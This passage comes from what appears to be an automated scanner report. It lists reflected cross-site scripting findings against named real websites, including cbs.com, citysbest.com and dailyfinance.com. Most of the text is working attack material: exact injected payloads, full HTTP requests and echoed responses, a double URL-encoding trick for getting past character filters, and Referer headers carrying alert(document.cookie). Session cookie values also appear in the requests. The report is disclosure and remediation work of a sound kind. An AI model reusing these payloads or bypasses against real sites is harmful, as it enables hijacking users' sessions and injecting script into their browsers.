<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<!-- SEO Begin --> <m ...[SNIP]... <script language="javascript" type="text/javascript"> var pid = "8buxD2A6bKEXPle0tw9xXiSNXz7b6o4y141fb";alert(1)//565b10a0203";
The value of the pid request parameter is copied into a JavaScript rest-of-line comment. The payload adbfe%0aalert(1)//96ecf22eb82 was submitted in the pid parameter. This input was echoed as adbfe alert(1)//96ecf22eb82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /primetime/big_bang_theory/video/?pid=8buxD2A6bKEXPle0tw9xXiSNXz7b6o4yadbfe%0aalert(1)//96ecf22eb82&nrd=1 HTTP/1.1 Host: www.cbs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache X-Powered-By: PHP/5.2.14 Status: 404 Not Found X-Real-Server: ws3172.drt.cbsig.net Content-Type: text/html; charset=ISO-8859-1 Expires: Sun, 06 Feb 2011 20:16:45 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 06 Feb 2011 20:16:45 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: carousel_state=0%2Ctwoby%2C1%7C1%2Ctwoby%2C1%7C2%2Ctwoby%2C1; expires=Sun, 06-Feb-2011 21:16:44 GMT Set-Cookie: video_section=Default; expires=Sun, 06-Feb-2011 21:16:44 GMT Content-Length: 84308
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<!-- SEO Begin --> <m ...[SNIP]... language="Javascript"> jQuery(document).ready(function() { jQuery.noConflict(); //jQuery('#copy_url').val("http://www.cbs.com/primetime/big_bang_theory/video/?pid=8buxD2A6bKEXPle0tw9xXiSNXz7b6o4yadbfe alert(1)//96ecf22eb82") jQuery('#copy_url').click(function(){ jQuery('#copy_url').focus(); jQuery('#copy_url').select(); });
var vEmbed = "<object width='400' height='300'> ...[SNIP]...
The value of the pid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19e96"><script>alert(1)</script>daa85ffaa37 was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /primetime/big_bang_theory/video/?pid=8buxD2A6bKEXPle0tw9xXiSNXz7b6o4y19e96"><script>alert(1)</script>daa85ffaa37&nrd=1 HTTP/1.1 Host: www.cbs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache X-Powered-By: PHP/5.2.14 Status: 404 Not Found X-Real-Server: ws3227.drt.cbsig.net Content-Type: text/html; charset=ISO-8859-1 Expires: Sun, 06 Feb 2011 20:16:23 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 06 Feb 2011 20:16:23 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: carousel_state=0%2Ctwoby%2C1%7C1%2Ctwoby%2C1%7C2%2Ctwoby%2C1; expires=Sun, 06-Feb-2011 21:16:25 GMT Set-Cookie: video_section=Default; expires=Sun, 06-Feb-2011 21:16:25 GMT Content-Length: 79723
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<!-- SEO Begin --> <m ...[SNIP]... <link rel="video_src" href="http://www.cbs.com/thunder/canplayer/canplayer.swf?pid=8buxD2A6bKEXPle0tw9xXiSNXz7b6o4y19e96"><script>alert(1)</script>daa85ffaa37&partner=cbs&gen=1&autoPlayVid=true" /> ...[SNIP]...
The value of the files request parameter is copied into a JavaScript rest-of-line comment. The payload 7a618%0aalert(1)//448eb782eaf was submitted in the files parameter. This input was echoed as 7a618 alert(1)//448eb782eaf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sitecommon/includes/cacheable/combine.php?type=js&files=http://ocp.cbs.com/adFunctions.js?site=164|/primetime/big_bang_theory/js/dw_site.js|/sitecommon/js/dw_global.js7a618%0aalert(1)//448eb782eaf HTTP/1.1 Host: www.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding X-Real-Server: ws3179.drt.cbsig.net Content-Type: application/javascript Expires: Sun, 06 Feb 2011 20:32:18 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 06 Feb 2011 20:32:18 GMT Connection: close Content-Length: 22986
The value of the files request parameter is copied into the HTML document as plain text between tags. The payload 207e6<script>alert(1)</script>c040d4c2270 was submitted in the files parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sitecommon/includes/cacheable/combine.php?type=js&files=207e6<script>alert(1)</script>c040d4c2270 HTTP/1.1 Host: www.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding X-Real-Server: ws3179.drt.cbsig.net Content-Type: application/javascript Expires: Sun, 06 Feb 2011 20:32:17 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 06 Feb 2011 20:32:17 GMT Connection: close Content-Length: 59
1.288. http://www.cbs.com/sitecommon/includes/cacheable/combine.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cbs.com
Path:
/sitecommon/includes/cacheable/combine.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload cedf2%0aalert(1)//b98a9b47bff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cedf2 alert(1)//b98a9b47bff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sitecommon/includes/cacheable/combine.php?type=js&files=http://ocp.cbs.com/adFunctions.js?site=164|/primetime/big_bang_theory/js/dw_site.js|/sitecommon/js/dw_globa/cedf2%0aalert(1)//b98a9b47bffl.js HTTP/1.1 Host: www.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding X-Real-Server: ws3177.drt.cbsig.net Content-Type: application/javascript Expires: Sun, 06 Feb 2011 20:32:18 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 06 Feb 2011 20:32:18 GMT Connection: close Content-Length: 22987
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 952f5%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9092bca5106 was submitted in the REST URL parameter 1. This input was echoed as 952f5</script><script>alert(1)</script>9092bca5106 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /_uac952f5%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9092bca5106/adpage.html HTTP/1.1 Host: www.citysbest.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b3af"><script>alert(1)</script>d5ec3faf17f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /_uac2b3af"><script>alert(1)</script>d5ec3faf17f/adpage.html HTTP/1.1 Host: www.citysbest.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa8d4%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efe33dffe06e was submitted in the REST URL parameter 1. This input was echoed as aa8d4</script><script>alert(1)</script>fe33dffe06e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efe33dffe06e/ HTTP/1.1 Host: www.citysbest.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1861c"><script>alert(1)</script>acbaae0e7bd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mapquest1861c"><script>alert(1)</script>acbaae0e7bd/ HTTP/1.1 Host: www.citysbest.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ababd%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec96ef10a8fd was submitted in the REST URL parameter 1. This input was echoed as ababd</script><script>alert(1)</script>c96ef10a8fd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /trafficababd%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec96ef10a8fd/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2Fmapquestaa8d4%25253c%25252fscript%25253e%25253cscript%25253ealert%252528document.cookie%252529%25253c%25252fscript%25253efe33dffe06e%2F&cb=271675454 HTTP/1.1 Host: www.citysbest.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20912"><script>alert(1)</script>b3408fe20ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /traffic20912"><script>alert(1)</script>b3408fe20ce/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2Fmapquestaa8d4%25253c%25252fscript%25253e%25253cscript%25253ealert%252528document.cookie%252529%25253c%25252fscript%25253efe33dffe06e%2F&cb=271675454 HTTP/1.1 Host: www.citysbest.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 849fb%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8ed29de1c6c was submitted in the REST URL parameter 1. This input was echoed as 849fb</script><script>alert(1)</script>8ed29de1c6c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /traffic849fb%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8ed29de1c6c/status.gif?ver=1297024389 HTTP/1.1 Host: www.citysbest.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45872"><script>alert(1)</script>628458da9d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /traffic45872"><script>alert(1)</script>628458da9d0/status.gif?ver=1297024389 HTTP/1.1 Host: www.citysbest.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e172"><script>alert(1)</script>d0a96e7b6bc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /traffic/status.gif5e172"><script>alert(1)</script>d0a96e7b6bc?ver=1297024389 HTTP/1.1 Host: www.citysbest.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7d1b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebe765f18667 was submitted in the REST URL parameter 2. This input was echoed as f7d1b</script><script>alert(1)</script>be765f18667 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /traffic/status.giff7d1b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebe765f18667?ver=1297024389 HTTP/1.1 Host: www.citysbest.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the 3054c%22-alert(document.cookie)-%22c83105876b0 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2bad5"-alert(1)-"1844aeff19e was submitted in the 3054c%22-alert(document.cookie)-%22c83105876b0 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?3054c%22-alert(document.cookie)-%22c83105876b0=12bad5"-alert(1)-"1844aeff19e HTTP/1.1 Host: www.dailyfinance.com Proxy-Connection: keep-alive Referer: http://www.dailyfinance.com/?3054c%22-alert(document.cookie)-%22c83105876b0=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; AOL_StockQuotesLiveUpdate=1; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; df_mon_dom=true; JSESSIONID=24A9B247E5951D815B25A6B748449EA7
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:34:58 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=utf-8 Set-Cookie: JSESSIONID=D5AE613AA8E55EFF8F0281D0AF53DB94; Path=/ Content-Length: 141576
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... nce.com";
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ' ...[SNIP]...
1.300. http://www.dailyfinance.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3054c"-alert(1)-"c83105876b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?3054c"-alert(1)-"c83105876b0=1 HTTP/1.1 Host: www.dailyfinance.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 19:47:07 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=utf-8 Set-Cookie: JSESSIONID=47843EA14399D06A26E7833C4CA1046C; Path=/ Content-Length: 141563
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... s_265.linkInternalFilters="javascript:,dailyfinance.com";
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.301. http://www.dailyfinance.com/about/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/about/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b569e"-alert(1)-"0c849816d68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /about/?b569e"-alert(1)-"0c849816d68=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.302. http://www.dailyfinance.com/article/mga-files-antitrust-case-against-mattel/1178866/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e702"-alert(1)-"7b7ae57bd3c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article/mga-files-antitrust-case-against-mattel/1178866/?3e702"-alert(1)-"7b7ae57bd3c=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/java ...[SNIP]...
1.303. http://www.dailyfinance.com/article/mga-files-antitrust-case-against-mattel/1178866/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7625c"><script>alert(1)</script>1046fb9ec66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /article/mga-files-antitrust-case-against-mattel/1178866/?7625c"><script>alert(1)</script>1046fb9ec66=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da218"><img%20src%3da%20onerror%3dalert(1)>5fdda549cb4 was submitted in the REST URL parameter 2. This input was echoed as da218"><img src=a onerror=alert(1)>5fdda549cb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/careersda218"><img%20src%3da%20onerror%3dalert(1)>5fdda549cb4/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
